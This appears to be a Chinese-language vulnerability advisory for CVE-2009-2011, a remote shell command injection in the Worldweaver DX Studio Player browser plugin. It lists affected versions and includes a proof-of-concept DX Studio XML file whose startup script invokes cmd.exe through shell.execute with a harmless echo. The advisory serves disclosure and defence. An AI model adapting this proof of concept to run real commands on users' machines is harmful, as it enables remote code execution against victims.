安全研究
安全漏洞
Worldweaver DX Studio Player浏览器插件远程任意shell命令注入漏洞
发布日期:2009-05-21
更新日期:2009-05-26
受影响系统:
worldweaver Worldweaver DX Studio Player 3.0.29 0不受影响系统:
worldweaver Worldweaver DX Studio Player 3.0.22 0
worldweaver Worldweaver DX Studio Player 3.0.12 0
worldweaver Worldweaver DX Studio Player 3.0.29 1描述:
BUGTRAQ ID: 35273
CVE ID: CVE-2009-2011
Worldweaver DX Studio是高级实时3D应用和游戏的开发工具。
Worldweaver DX Studio Player在实现上存在远程命令注入漏洞,攻击者可利用此漏洞在受影响应用中执行任意shell命令。
<*来源:Diego Juarez
链接:http://osvdb.org/show/osvdb/54969
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<dxstudio version="1.0.0" width="800" height="600" defaultscriptlanguage="javascript">
<display frame="yes" hidecursor="no" hideconsole="no" hidecontext="no" maxfps="100" unthrottled="no" priority="normal" syncrefresh="yes" changeresolution="no" userresize="yes" workarea="no" windowmask="no" src="" minplayerversion="1.0.0">
<loading console="yes" custom="no" custombackground="no" customlogo="yes" showversion="no">
<prop id="background" type="color" r="0" g="0" b="0" a="1" />
<logo src="" />
<customprogress />
</loading>
</display>
<script>
<![CDATA[function onInit()
{
shell.execute("cmd.exe","/k cls|@echo this is wrong, very wrong.")
} ] ]>
</script>
<licenseinfo stamp="cgdaaaaa" />
<security>
<prop id="password" type="string" value="" />
<prop id="allowplayer" type="bool" state="no" />
<prop id="nocache" type="bool" state="yes" />
</security>
</dxstudio>
建议:
厂商补丁:
worldweaver
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.worldweaver.com/
浏览次数:1702
严重程度:0(网友投票)
绿盟科技给您安全的保障